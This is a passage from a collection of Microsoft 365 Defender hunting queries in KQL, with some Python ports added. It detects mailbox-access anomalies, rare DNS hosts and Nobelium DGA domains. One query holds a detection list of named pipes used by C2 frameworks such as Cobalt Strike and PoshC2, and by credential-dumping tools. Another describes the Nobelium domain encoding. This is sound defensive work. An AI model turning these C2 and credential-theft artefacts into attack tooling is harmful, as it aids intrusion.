    | where Application has "Exchange"
    | extend RawEventData = parse_json(RawEventData)
    | where RawEventData.ResultStatus == "Succeeded"
    | project Timestamp, ActionType, MailboxOwnerUPN = tostring(RawEventData.MailboxOwnerUPN)
    | make-series Total=count() on Timestamp from startofday(ago(starttime)) to startofday(ago(endtime)) step timeframe;
let TimeSeriesAlerts = TimeSeriesData
    | extend (anomalies, score, baseline) = series_decompose_anomalies(Total, scorethreshold, -1, 'linefit')
    | mv-expand Total to typeof(double), Timestamp to typeof(datetime), anomalies to typeof(double), score to typeof(double), baseline to typeof(long)
    | where anomalies > 0
    | project Timestamp, Total, baseline, anomalies, score;
// Joining the flagged outliers from the previous step with the original dataset to present contextual information
// for the anomalous hour, so analysts can investigate or make informed decisions.
TimeSeriesAlerts
| where Timestamp > ago(2d)
// Join against the base logs for the specified timeframe to retrieve the records associated with the hour of the anomaly.
// The alert timestamps are hourly bins, so the raw events must be binned the same way; joining on raw event timestamps would almost never match.
| join (
    CloudAppEvents
    | where Timestamp > ago(2d)
    | where ActionType =~ "MailItemsAccessed"
    | where Application has "Exchange"
    | extend RawEventData = parse_json(RawEventData)
    | where RawEventData.ResultStatus == "Succeeded"
    | extend EventTime = Timestamp, Timestamp = bin(Timestamp, timeframe)
) on Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | V | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Stefan Sellmer
**GitHub alias:** @stesell
**Organization:** Microsoft 365 Defender
**Contact info:** stesell@microsoft.com

================================================
FILE: Command and Control/C2-NamedPipe.md
================================================

# Detects malicious SMB Named Pipes (used by common C2 frameworks)

Detects the creation of a [named pipe](https://docs.microsoft.com/en-US/openspecs/windows_protocols/ms-wpo/4de75e21-36fd-440a-859b-75accc74487c) used by known APT malware.

## Query

```Kusto
// maximum lookback time
let minTimeRange = ago(7d);
// this is what should be constantly tweaked with default C2 framework names; the search uses has_any, which matches whole terms, not arbitrary substrings
let badPipeNames = pack_array(
    '\\psexec',           // PsExec default pipe
    '\\paexec',           // PAExec (PsExec-like tool) default pipe
    '\\remcom',           // RemCom (PsExec-like tool) default pipe
    '\\csexec',           // CSExec (PsExec-like tool) default pipe
    '\\isapi_http',       // Uroburos Malware Named Pipe
    '\\isapi_dg',         // Uroburos Malware Named Pipe
    '\\isapi_dg2',        // Uroburos Malware Named Pipe
    '\\sdlrpc',           // Cobra Trojan / Project Cobra Named Pipe http://goo.gl/8rOZUX, https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra
    '\\ahexec',           // Sofacy group malware
    '\\winsession',       // Wild Neutron APT malware https://goo.gl/pivRZJ
    '\\lsassw',           // Wild Neutron APT malware https://goo.gl/pivRZJ
    '\\46a676ab7f179e511e30dd2dc41bd388', // Project Sauron https://goo.gl/eFoP4A
    '\\9f81f59bc58452127884ce513865ed20', // Project Sauron https://goo.gl/eFoP4A
    '\\e710f28d59aa529d6792ca6ff0ca1b34', // Project Sauron https://goo.gl/eFoP4A
    '\\rpchlp_3',         // Project Sauron https://goo.gl/eFoP4A - Technical Analysis Input
    '\\NamePipe_MoreWindows', // Cloud Hopper Annex B https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, US-CERT Alert - RedLeaves https://www.us-cert.gov/ncas/alerts/TA17-117A
    '\\pcheap_reuse',     // Pipe used by Equation Group malware 77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0
    '\\gruntsvc',         // Covenant default named pipe
    '\\583da945-62af-10e8-4902-a8f205c72b2e', // SolarWinds SUNBURST malware report https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
    '\\bizkaz',           // Snatch Ransomware https://thedfirreport.com/2020/06/21/snatch-ransomware/
    '\\atctl',            // https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection
    '\\userpipe',         // ruag apt case
    '\\iehelper',         // ruag apt case
    '\\comnap',           // https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra
    '\\lsadump',          // Cred Dump-Tools Named Pipes
    '\\cachedump',        // Cred Dump-Tools Named Pipes
    '\\wceservicepipe',   // Cred Dump-Tools Named Pipes
    '\\jaccdpqnvbrrxlaf', // PoshC2 default named pipe
    '\\svcctl',           // CrackMapExec default named pipe; also the Service Control Manager RPC endpoint used by legitimate remote service management, so expect noise
    '\\csexecsvc',        // CSEXEC default named pipe
    '\\MSSE-',            // CobaltStrike default named pipe
    '\\status_',          // CobaltStrike default named pipe https://github.com/Neo23x0/sigma/issues/253
    '\\msagent_',         // (target) CobaltStrike default named pipe
    '\\postex_ssh_',      // CobaltStrike default named pipe
    '\\postex_',          // CobaltStrike default named pipe
    '\\Posh'              // PoshC2 default named pipe
);
DeviceEvents
| where ActionType == "NamedPipeEvent" and Timestamp > minTimeRange
| extend ParsedFields = parse_json(AdditionalFields)
| where ParsedFields.FileOperation == "File created"
| where ParsedFields.PipeName has_any (badPipeNames)
| project Timestamp, ActionType, DeviceName, InitiatingProcessAccountDomain, InitiatingProcessAccountName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, ParsedFields.FileOperation, ParsedFields.PipeName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** [@xknow_infosec](https://twitter.com/xknow_infosec)

This detection is a summary of knowledge already known. Credits only to original authors. Defender for Endpoint recently added a new ActionType for SMB named pipes (NamedPipeEvent), which enables equivalent use cases on the same telemetry (for example, replicating all Sysmon Event ID 17/18 detections).
Original Authors / Credits / Resources:

* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml
* https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml
*  https://twitter.com/d4rksystem/status/1357010969264873472
* https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/
* https://github.com/Neo23x0/sigma/issues/253
* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml
* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml
* https://twitter.com/rpargman/status/1359961601160351744

================================================
FILE: Command and Control/Connection to Rare DNS Hosts.md
================================================

# Connection to Rare DNS Hosts

This query breaks hostnames down into their second- and third-level domain parts and analyzes the volume of connections made to each destination, looking for low-count entries. Note that this query is likely to be rather noisy in many organizations and may benefit from analysis over time, anomaly detection, or perhaps machine learning.

## Query

```Kusto
let LowCountThreshold = 10;
let MaxAge = ago(1d);
DeviceNetworkEvents
| where Timestamp > MaxAge
| where isnotempty(RemoteUrl) and RemoteUrl contains "."
// bare hostnames are lower-cased as they are ((?i) so that upper-case names take this branch too); anything else is treated as a URL and the host is parsed out
| extend RemoteDomain = iff(RemoteUrl matches regex @'(?i)^([a-z0-9]+(-[a-z0-9]+)*\.)+[a-z]{2,}$', tolower(RemoteUrl), tostring(parse_url(RemoteUrl).Host))
// domains contacted by few devices in the last day ...
| top-nested 100000 of RemoteDomain by dcount(DeviceId) asc
| where aggregated_RemoteDomain <= LowCountThreshold
// ... joined back to a week of events for those domains
| join kind=rightsemi (
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    | where isnotempty(RemoteUrl) and RemoteUrl contains "."
    | extend RemoteDomain = iff(RemoteUrl matches regex @'(?i)^([a-z0-9]+(-[a-z0-9]+)*\.)+[a-z]{2,}$', tolower(RemoteUrl), tostring(parse_url(RemoteUrl).Host))
) on RemoteDomain
| extend DomainArray = split(RemoteDomain, '.')
| extend SecondLevelDomain = strcat(tostring(DomainArray[-2]), '.', tostring(DomainArray[-1])),
         ThirdLevelDomain = strcat(tostring(DomainArray[-3]), '.', tostring(DomainArray[-2]), '.', tostring(DomainArray[-1]))
| summarize ConnectionCount = count(), DistinctDevices = dcount(DeviceId) by SecondLevelDomain, ThirdLevelDomain, RemoteDomain
| where DistinctDevices <= LowCountThreshold
| top 10000 by DistinctDevices asc
| order by ConnectionCount asc
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Michael Melone
**GitHub alias:** mjmelone
**Organization:** Microsoft
**Contact info:** @PowershellPoet

================================================
FILE: Command and Control/DNSPattern [Nobelium].md
================================================

# Nobelium campaign DNS pattern

This query looks for the DGA pattern of the domains associated with the Nobelium campaign (a five-label name whose first label is an encoded, digit-heavy subdomain and whose middle labels look like cloud API hostnames), in order to find other domains with the same activity pattern. This query is inspired by an Azure Sentinel [detection](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Hunting%20Queries/DnsEvents/Solorigate-DNS-Pattern.yaml).
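The subdomain heuristic that the query below applies (exactly five labels, cloud-API-looking middle labels, a 20 to 32 byte first label with no hyphen, and a digit share strictly between 5 and 50 percent), as an added Python example rather than code from the repository or from Microsoft. The query names it runs over are constructed under the reserved example.net/.org domains and are not real telemetry; `_terms` emulates KQL `has_any`, which matches whole terms rather than substrings:

```python
"""The Nobelium DGA subdomain heuristic from the query, over constructed DNS query names."""
import re

CLOUD_API_TERMS = ("api", "east", "west")


def _terms(text):
    """Emulate KQL has_any: it matches whole terms, so split on non-alphanumerics."""
    return {t for t in re.split(r"[^a-z0-9]+", text.lower()) if t}


def classify_domain(fqdn, min_len=20, max_len=32):
    """Return a match record if fqdn has the encoded-subdomain shape, else None."""
    labels = fqdn.lower().rstrip(".").split(".")
    # domain_split[-5] != "" and domain_split[-6] == "": exactly five labels
    if len(labels) != 5:
        return None
    sub_domain = labels[0]
    if "-" in sub_domain:
        return None
    # the two middle labels must carry a cloud/API looking term (e.g. "appsync-api", "us-east-2")
    if not (_terms(labels[-3] + " " + labels[-4]) & set(CLOUD_API_TERMS)):
        return None
    # observed encoded subdomains were 20 to 30 bytes long
    if not (min_len <= len(sub_domain) <= max_len):
        return None
    digits = sum(c.isdigit() for c in sub_domain)
    if digits <= 1:
        return None
    percentage_numerical = digits / len(sub_domain) * 100
    if not (5 < percentage_numerical < 50):
        return None
    return {"domain": labels[-2] + "." + labels[-1], "sub_domain": sub_domain,
            "percentage_numerical": round(percentage_numerical, 1)}


def hunt(query_names):
    """summarize rowcount = count() by DomainName, ordered ascending as in the query."""
    counts = {}
    for name in query_names:
        if classify_domain(name) is not None:
            counts[name] = counts.get(name, 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1])


# Constructed DNS query names (not real telemetry); example.net/.org are reserved documentation domains
SAMPLE_QUERIES = [
    "k3x9v0dhsq2lm7wz8b1t.appsync-api.us-east-2.example.net",  # encoded 20-char subdomain, 35% digits
    "k3x9v0dhsq2lm7wz8b1t.appsync-api.us-east-2.example.net",
    "www.example.com",                                          # three labels
    "mail-01.corp.internal.example.com",                        # hyphen in the first label
    "cdn12345.static.west.example.org",                         # first label too short
    "abcdefghijklmnopqrst.appsync-api.eu-west-1.example.net",   # no digits at all
    "1234567890abcdefghij.api.east.example.org",                # exactly 50% digits: not < 50
]

if __name__ == "__main__":
    for name, count in hunt(SAMPLE_QUERIES):
        print(count, name, classify_domain(name))
```

Only the first constructed name survives all five filters; the last two show why the digit-share and length checks are needed in addition to the label-shape check.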
## Query
```Kusto
let cloudApiTerms = dynamic(["api", "east", "west"]);
let timeFrame = ago(1d);
let relevantDeviceNetworkEvents = DeviceNetworkEvents
    | where Timestamp >= timeFrame
    | where RemoteUrl !has "\\" and RemoteUrl !has "/" // performance filter
    | where RemoteUrl has_any(cloudApiTerms)
    | project-rename DomainName = RemoteUrl
    | project Timestamp, DomainName, DeviceId, DeviceName;
let relevantDeviceEvents = DeviceEvents
    | where Timestamp >= timeFrame
    | where ActionType == "DnsQueryResponse" // performance filter
    | where AdditionalFields has_any(cloudApiTerms)
    | extend query = extractjson("$.DnsQueryString", AdditionalFields)
    | where isnotempty(query)
    | project-rename DomainName = query
    | project Timestamp, DomainName, DeviceId, DeviceName;
let relevantIdentityQueryEvents = IdentityQueryEvents
    | where Timestamp >= timeFrame
    | where ActionType == "DNS query"
    | where Protocol == "Dns" // performance filter
    | where QueryTarget has_any(cloudApiTerms)
    | project-rename DomainName = QueryTarget
    | project Timestamp, DomainName, DeviceId = "", DeviceName;
let relevantData = relevantIdentityQueryEvents
    | union relevantDeviceNetworkEvents
    | union relevantDeviceEvents;
let tokenCreation = relevantData
    | extend domain_split = split(DomainName, ".")
    // keep names with exactly five labels
    | where tostring(domain_split[-5]) != "" and tostring(domain_split[-6]) == ""
    | extend sub_domain = tostring(domain_split[0])
    | where sub_domain !contains "-"
    | extend sub_directories = strcat(domain_split[-3], " ", domain_split[-4])
    | where sub_directories has_any(cloudApiTerms);
tokenCreation
// Based on sample communications the subdomain is always between 20 and 30 bytes
| where strlen(sub_domain) >= 20 and strlen(sub_domain) <= 32
| extend domain = strcat(tostring(domain_split[-2]), ".", tostring(domain_split[-1]))
| extend subdomain_no = countof(sub_domain, @"(\d)", "regex")
| extend subdomain_ch = countof(sub_domain, @"([a-z])", "regex")
| where subdomain_no > 1
| extend percentage_numerical = toreal(subdomain_no) /
    toreal(strlen(sub_domain)) * 100
| where percentage_numerical < 50 and percentage_numerical > 5
// group by the registered domain so each row collects the generated subdomains seen under it
| summarize rowcount = count(), make_set(DomainName), make_set(DeviceId), make_set(DeviceName), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by domain
| order by rowcount asc
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | V | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium encoded domain in URL](./EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info
**Contributor:** Stefan Sellmer
**GitHub alias:** @stesell
**Organization:** Microsoft 365 Defender
**Contact info:** stesell@microsoft.com

================================================
FILE: Command and Control/Device network events w low count FQDN.txt
================================================
////////////////////////////////////////////////////////////////////////////////////
// Device Network Events Involving Low Count FQDNs
//
// This query reduces network events to only those with the RemoteUrl column populated,
// then parses the DNS name from the URL (if needed) and finds the least prevalent
// FQDNs. The result is then joined with DeviceNetworkEvents to highlight anomalous
// network communication.
////////////////////////////////////////////////////////////////////////////////////
DeviceNetworkEvents
| where Timestamp > ago(1h)
| where InitiatingProcessFileName !in~ ('iexplore.exe', 'chrome.exe', 'opera.exe', 'safari.exe') // Remove web browsers
    and isnotempty(RemoteUrl)
// parse_url() exposes the host name under the Host key
| extend FQDN = iff(RemoteUrl matches regex "^([a-zA-Z0-9._-])+$", tostring(RemoteUrl), tostring(parse_url(RemoteUrl).Host))
| top-nested 100 of FQDN by dcount(DeviceId) asc
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(1h)
    | where isnotempty(RemoteUrl)
    | extend FQDN = iff(RemoteUrl matches regex "^([a-zA-Z0-9._-])+$", tostring(RemoteUrl), tostring(parse_url(RemoteUrl).Host))
) on FQDN
| order by aggregated_FQDN asc

================================================
FILE: Command and Control/EncodedDomainURL [Nobelium].md
================================================
# Nobelium encoded domain in URL

Looks for a logon domain in the Azure AD logs, encoded with the same DGA encoding used in the Nobelium campaign.
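The query below rebuilds that encoding for every sign-in domain in the tenant: it keeps the first label of the domain (or the second one when the first is two characters or shorter, so that a prefix such as `na.` is skipped), splits it on hyphens, drops everything but `[a-z0-9]`, replaces each character with the one four positions further along a fixed 35-character alphabet, discards encodings shorter than six characters, and then looks for each result as a substring of every DNS name observed. The Python below is an added, stand-alone port of that logic (not code from this repository) so the encoding can be checked against constructed names offline; the tenant domains and DNS names in it are made up, and the alphabet is the `dictionary` the query defines.

```python
"""Added example: port of the domain encoding and substring match performed by
the Nobelium encoded-domain query. Not part of this repository."""
import re

# The query's 35-character substitution alphabet (26 letters and the digits 1-9; no '0').
DICTIONARY = list("rq3gsalt6u1iyfzop572d49bnx8cvmkewhj")
SHIFT = 4                                   # dictionary[(index + 4) % 35]
MIN_ENCODED_LEN = 6                         # strlen(target_encoded) > 5


def encode_token(token: str) -> str:
    """Encode one hyphen-free token: keep only [a-z0-9] and shift each character
    four places along DICTIONARY. A character missing from the alphabet ('0')
    has array_index_of == -1 in Kusto and therefore lands on dictionary[3];
    that quirk is mirrored here so the keys match what the query produces."""
    out = []
    for ch in re.findall(r"[a-z0-9]", token.lower()):
        index = DICTIONARY.index(ch) if ch in DICTIONARY else -1
        out.append(DICTIONARY[(index + SHIFT) % len(DICTIONARY)])
    return "".join(out)


def candidate_tokens(tenant_domain: str) -> list:
    """Mirror the query's shaping of a sign-in domain: use the first label unless
    it is two characters or shorter (na.contoso.com -> contoso), then split on '-'."""
    labels = tenant_domain.lower().split(".")
    target = labels[0]
    if len(target) <= 2 and len(labels) > 1:
        target = labels[1]
    return [t for t in target.split("-") if t]


def encoded_keys(tenant_domains) -> set:
    """Encoded forms worth searching for; short ones are dropped because they
    would only produce false positives (the query's strlen(target_encoded) > 5)."""
    keys = set()
    for domain in tenant_domains:
        for token in candidate_tokens(domain):
            encoded = encode_token(token)
            if len(encoded) >= MIN_ENCODED_LEN:
                keys.add(encoded)
    return keys


def match_dns_names(dns_names, keys) -> list:
    """indexof(DomainName, set_target_encoded) > -1: report (name, key) for every
    DNS name that contains an encoded tenant token anywhere in it."""
    hits = []
    for name in dns_names:
        lowered = name.lower()
        for key in sorted(keys):
            if key in lowered:
                hits.append((name, key))
    return hits


# Constructed sample data; the tenant and the DNS names are made up for the example.
SAMPLE_TENANT_DOMAINS = ["contoso.com", "na.contoso.com", "contoso-labs.com"]
SAMPLE_DNS_NAMES = [
    "k3xq2mv5bc8zn6p0rtwa.appsync-api.us-east-2.example.test",
    "xyze2vi262ab.appsync-api.us-west-2.example.test",
    "login.microsoftonline.com",
]

if __name__ == "__main__":
    keys = encoded_keys(SAMPLE_TENANT_DOMAINS)
    print("encoded keys:", sorted(keys))
    for name, key in match_dns_names(SAMPLE_DNS_NAMES, keys):
        print(f"{name} contains {key}")
```

For the sample tenant the only key that survives the length floor is the encoding of `contoso`; the four-character encoding of `labs` is discarded, which is exactly the trade-off the query's comment about short strings describes.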
See [*Important steps for customers to protect themselves from recent nation-state cyberattacks*](https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/) for more on the Nobelium campaign (formerly known as Solorigate).

This query is inspired by an Azure Sentinel [detection](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Hunting%20Queries/DnsEvents/Solorigate-Encoded-Domain-URL.yaml).

## Query
```Kusto
let timeFrame = ago(1d);
let relevantDeviceNetworkEvents = DeviceNetworkEvents
    | where Timestamp >= timeFrame
    | where RemoteUrl !has "\\" and RemoteUrl !has "/"
    | project-rename DomainName = RemoteUrl
    | summarize by DomainName;
let relevantDeviceEvents = DeviceEvents
    | where Timestamp >= timeFrame
    | where ActionType == "DnsQueryResponse"
    | extend query = extractjson("$.DnsQueryString", AdditionalFields)
    | where isnotempty(query)
    | project-rename DomainName = query
    | summarize by DomainName;
let relevantIdentityQueryEvents = IdentityQueryEvents
    | where Timestamp >= timeFrame
    | where ActionType == "DNS query"
    | where Protocol == "Dns"
    | project-rename DomainName = QueryTarget
    | summarize by DomainName;
let DnsEvents = relevantIdentityQueryEvents
    | union relevantDeviceNetworkEvents
    | union relevantDeviceEvents
    | summarize by DomainName;
let dictionary = dynamic(["r","q","3","g","s","a","l","t","6","u","1","i","y","f","z","o","p","5","7","2","d","4","9","b","n","x","8","c","v","m","k","e","w","h","j"]);
let regex_bad_domains = AADSignInEventsBeta
    // Collect domains from the tenant from sign-in logs
    | where Timestamp >= timeFrame
    | extend domain = tostring(split(AccountUpn, "@", 1)[0])
    | where domain != ""
    | summarize by domain
    | extend split_domain = split(domain, ".")
    // This cuts back on domains such as na.contoso.com by electing not to match on the "na" portion
    | extend target_string = iff(strlen(tostring(split_domain[0])) <= 2, tostring(split_domain[1]), tostring(split_domain[0]))
    | extend target_string = split(target_string, "-")
    | mv-expand
    target_string
    // Rip all of the alphanumeric characters out of the domain name
    | extend string_chars = extract_all(@"([a-z0-9])", tostring(target_string))
    // GUID for tracking our data
    | extend guid = new_guid()
    // Expand to get all of the individual chars from the domain
    | mv-expand string_chars
    | extend chars = tostring(string_chars)
    // Conduct the computation to encode the domain as per the actor's spec
    | extend computed_char = array_index_of(dictionary, chars)
    | extend computed_char = dictionary[(computed_char + 4) % array_length(dictionary)]
    | summarize make_list(computed_char) by guid, domain
    | extend target_encoded = tostring(strcat_array(list_computed_char, ""))
    // These are probably too small, but can be edited (expect FPs when going too small)
    | where strlen(target_encoded) > 5
    | distinct target_encoded
    | summarize make_set(target_encoded)
    // Key to join to DNS
    | extend key = 1;
DnsEvents
| extend key = 1
// For each DNS query, join the malicious domain list
| join kind=inner (regex_bad_domains) on key
| project-away key
// Expand each malicious key for each DNS query observed
| mv-expand set_target_encoded
// indexof allows us to fuzzy match on the substring
| extend match = indexof(DomainName, tostring(set_target_encoded))
| where match > -1
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | V | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](./DNSPattern%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info
**Contributor:** Stefan Sellmer
**GitHub alias:** @stesell
**Organization:** Microsoft 365 Defender
**Contact info:** stesell@microsoft.com

================================================
FILE: Command and Control/Tor.txt
================================================
// This query looks for the Tor client, or for a common Tor plugin called Meek.
